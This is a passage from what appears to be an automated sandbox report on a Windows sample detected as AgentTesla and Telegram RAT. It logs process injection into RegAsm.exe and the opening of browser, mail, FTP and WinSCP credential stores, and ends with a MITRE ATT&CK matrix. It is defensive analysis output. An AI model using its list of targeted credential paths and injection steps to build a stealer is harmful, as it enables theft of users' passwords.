                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7CB008Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeQueries volume information: C:\Users\user\Desktop\LmIclOjfqc.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.4142445479.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LmIclOjfqc.exe PID: 7264, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		1
                        Scheduled Task/Job                        		211
                        Process Injection                        		1
                        Obfuscated Files or Information                        		1
                        Credentials in Registry                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		1
                        Ingress Tool Transfer                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job                        		Logon Script (Windows)1
                        Scheduled Task/Job                        		1
                        Software Packing                        		Security Account Manager1
                        Query Registry                        		SMB/Windows Admin Shares1
                        Email Collection                        		11
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading                        		NTDS211
                        Security Software Discovery                        		Distributed Component Object ModelInput Capture3
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                        Virtualization/Sandbox Evasion                        		LSA Secrets1
                        Process Discovery                        		SSHKeylogging14
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                        Process Injection                        		Cached Domain Credentials141
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.